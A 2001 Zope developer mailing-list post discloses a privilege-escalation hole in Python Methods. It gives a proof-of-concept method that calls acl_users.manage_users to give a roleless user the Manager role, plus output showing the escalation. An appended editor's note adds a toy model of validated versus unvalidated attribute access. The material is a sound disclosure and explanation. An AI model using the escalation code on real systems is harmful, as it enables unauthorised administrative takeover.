[Zope-dev] python methods & zope - security hole ?

Joseph Wayne Norton norton@alum.mit.edu
Wed, 31 Jan 2001 15:20:58 +0900


Evan -

I believe I have found a situation while using python methods that
exposes a security hole.  A user that can create python methods can
grant the Manager role to himself by simply writing and then calling
the manage_users method.  This issue might also apply to other
scenarios.

I created a simple test case to check the behavior ...

  - create a user without any roles in an acl_users folder (see below)

  - create a python method such as the one below that grants root
    access to the user (see below)

  - create a dtml method that calls the python method .... this method
    should have view and access content information granted (see
    below) to the user created in the first step.  In my case, I'm
    simply using the anonymous role ... but it could be another role
    setup for developers, content editors, etc.

  - execute the dtml method (see below)

I also created a similar test case for dtml methods and the dtml
method behaved as I expected .... preventing the user from obtaining
the manage_users role because they do not have the role in the first
place.

I just want to confirm if this is a known issue or a new issue (or
feature or mistake in my zope setup).  I'm currently running with zope
2.2.5 and python methods 0-1-7. If this is indeed an issue, it might
be worthwhile to simply document this issue on the PythonMethods
product page.

thanks,

- joe n.

###############################################################################
# Here is the output of this behavior ...
UserName: dummy_non_manager
Roles: ()
Has 'View' ?: 0
Has 'Manage users' ?: 0
user 'dummy_non_manager' roles '['Manager']' 
user 'dummy_manager' roles '['Manager']' 
UserName: dummy_non_manager
Roles: ('Manager',)
Has 'View' ?: 1
Has 'Manage users' ?: 1

###############################################################################
# Here is the python method
args: self,REQUEST

body:
ret = ''
users = {'dummy_manager' : ['Manager'],'dummy_non_manager' : ['Manager']}
for u in users.keys():
    roles = users.get(u)
    REQUEST.set('name', u)
    REQUEST.set('roles', roles)
    self.acl_users.manage_users('Change',REQUEST)
    ret = ret + ('user \'%s\' roles \'%s\' <br>\n' % (u, roles))
return ret

###############################################################################
# Here is the dtml method:
<dtml-var standard_html_header>

UserName:             <dtml-var "REQUEST['AUTHENTICATED_USER'].getUserName()"><br>
Roles:                <dtml-var "REQUEST['AUTHENTICATED_USER'].getRoles()"><br>
Has 'View' ?:         <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('View',REQUEST['AUTHENTICATED_USER'])"><br>
Has 'Manage users' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('Manage users',REQUEST['AUTHENTICATED_USER'])"><br>

<dtml-var "acl_users_roles_python_method(REQUEST)">

UserName:             <dtml-var "REQUEST['AUTHENTICATED_USER'].getUserName()"><br>
Roles:                <dtml-var "REQUEST['AUTHENTICATED_USER'].getRoles()"><br>
Has 'View' ?:         <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('View',REQUEST['AUTHENTICATED_USER'])"><br>
Has 'Manage users' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('Manage users',REQUEST['AUTHENTICATED_USER'])"><br>

<dtml-var standard_html_footer>

-- 
Joseph Norton

norton@alum.mit.edu
+81-3-3822-6936
2-10-7 Tabata, Kita-ku, Tokyo 114-0014, Japan (〒114-0014 東京都北区田端２丁目10-7)
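Editor's note: the contrast the report draws, a DTML method refusing the call while the Python method grants Manager to its caller, comes down to whether attribute access is validated against the caller's roles before the method is invoked. The following toy model is an added example, not code from the post above and not Zope's or the PythonMethods product's own security machinery; every class and name in it (User, UserFolder, guarded_getattr, the two self-promotion functions and the permission tables) is constructed for illustration. It shows the same acl_users.manage_users call made twice: once through a plain attribute lookup, which succeeds for a caller with no roles, and once through a validation hook that checks the permission protecting the attribute, which refuses it.

```python
# Added example: a constructed model of validated versus unvalidated attribute
# access.  Not Zope code; names and permission tables are illustrative only.


class Unauthorized(Exception):
    """Raised when the caller lacks the permission an attribute requires."""


class User:
    """A principal with a name and a list of roles (constructed stand-in)."""

    def __init__(self, name, roles=()):
        self.name = name
        self.roles = list(roles)

    def allowed(self, roles):
        # The caller may act if any role granted to the permission is theirs.
        return any(r in self.roles for r in roles)


class UserFolder:
    """Stand-in for acl_users: a user store plus the permission map that a
    real user folder would carry in its security settings (constructed)."""

    # permission -> roles that hold it (hard-coded for the example)
    permission_roles = {
        'View': ('Anonymous', 'Manager'),
        'Manage users': ('Manager',),
    }
    # attribute -> permission protecting it; anything unlisted is private
    attribute_permissions = {
        'getUserNames': 'View',
        'manage_users': 'Manage users',
    }

    def __init__(self):
        self.users = {}

    def manage_users(self, name, roles):
        self.users[name] = list(roles)

    def getUserNames(self):
        return sorted(self.users)


def guarded_getattr(obj, name, caller):
    """Validated attribute access: find the permission protecting `name` on
    `obj` and return the attribute only if `caller` holds a role that has that
    permission.  Unlisted attributes are treated as private and never returned."""
    permission = obj.attribute_permissions.get(name)
    if permission is None:
        raise Unauthorized('%s is private' % name)
    if not caller.allowed(obj.permission_roles[permission]):
        raise Unauthorized('%s lacks %r for %s' % (caller.name, permission, name))
    return getattr(obj, name)


def unguarded_self_promotion(acl_users, caller):
    """The unvalidated path: plain attribute access, so the call goes through
    for any caller.  Returns the caller's roles after the call."""
    acl_users.manage_users(caller.name, ['Manager'])
    return acl_users.users[caller.name]


def guarded_self_promotion(acl_users, caller):
    """The same call made through validated access.  Returns the caller's
    roles after the call, or None when the access check refused it."""
    try:
        method = guarded_getattr(acl_users, 'manage_users', caller)
    except Unauthorized:
        return None
    method(caller.name, ['Manager'])
    return acl_users.users[caller.name]


if __name__ == '__main__':
    nobody = User('dummy_non_manager')          # no roles, as in the report
    print('unguarded:', unguarded_self_promotion(UserFolder(), nobody))
    print('guarded:  ', guarded_self_promotion(UserFolder(), nobody))
```

The guarded path is the one a restricted execution environment has to provide for every attribute lookup, not just for calls the script author thinks of as dangerous: the lookup of `manage_users` is what gets validated, so the decision is made before any argument reaches the method.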